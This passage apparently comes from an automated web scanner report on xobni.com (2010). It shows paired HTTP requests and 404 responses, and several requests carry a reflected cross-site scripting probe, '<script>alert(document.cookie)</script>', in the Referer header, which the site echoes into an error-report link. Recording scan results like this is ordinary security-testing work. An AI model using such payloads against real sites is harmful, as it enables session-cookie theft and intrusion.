           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/free?lc=en'>English</a><a href='/homepage/productmenu/free?lc=de'>Deutsch</a><a href='/homepage/productmenu/free?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldown
...[SNIP]...

Request 2

GET /homepage/productmenu/free HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7751

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/free?lc=en'>English</a><a href='/homepage/productmenu/free?lc=de'>Deutsch</a><a href='/homepage/productmenu/free?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'); return fa
...[SNIP]...

9.6. http://www.xobni.com/homepage/productmenu/mobilebb previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/homepage/productmenu/mobilebb

Request 1

GET /homepage/productmenu/mobilebb HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Fmobile81ff6%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Effa1c61d19d&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/mobilebb?lc=en'>English</a><a href='/homepage/productmenu/mobilebb?lc=de'>Deutsch</a><a href='/homepage/productmenu/mobilebb?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div cla
...[SNIP]...

Request 2

GET /homepage/productmenu/mobilebb HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7763

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/mobilebb?lc=en'>English</a><a href='/homepage/productmenu/mobilebb?lc=de'>Deutsch</a><a href='/homepage/productmenu/mobilebb?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'
...[SNIP]...

9.7. http://www.xobni.com/homepage/productmenu/plus previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/homepage/productmenu/plus

Request 1

GET /homepage/productmenu/plus HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7871

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Fmobile81ff6%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Effa1c61d19d&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/plus?lc=en'>English</a><a href='/homepage/productmenu/plus?lc=de'>Deutsch</a><a href='/homepage/productmenu/plus?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldown
...[SNIP]...

Request 2

GET /homepage/productmenu/plus HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7751

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/plus?lc=en'>English</a><a href='/homepage/productmenu/plus?lc=de'>Deutsch</a><a href='/homepage/productmenu/plus?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'); return fa
...[SNIP]...

9.8. http://www.xobni.com/homepage/productmenu/xobnione previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/homepage/productmenu/xobnione

Request 1

GET /homepage/productmenu/xobnione HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Fmobile81ff6%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Effa1c61d19d&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/xobnione?lc=en'>English</a><a href='/homepage/productmenu/xobnione?lc=de'>Deutsch</a><a href='/homepage/productmenu/xobnione?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div cla
...[SNIP]...

Request 2

GET /homepage/productmenu/xobnione HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7763

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/xobnione?lc=en'>English</a><a href='/homepage/productmenu/xobnione?lc=de'>Deutsch</a><a href='/homepage/productmenu/xobnione?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'
...[SNIP]...

9.9. http://www.xobni.com/learnmore/mobile/buynow previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/learnmore/mobile/buynow

Request 1

GET /learnmore/mobile/buynow HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7795

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Flearnmore%2Fmobile%2F&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/learnmore/mobile/buynow?lc=en'>English</a><a href='/learnmore/mobile/buynow?lc=de'>Deutsch</a><a href='/learnmore/mobile/buynow?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'clic
...[SNIP]...

Request 2

GET /learnmore/mobile/buynow HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7745

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
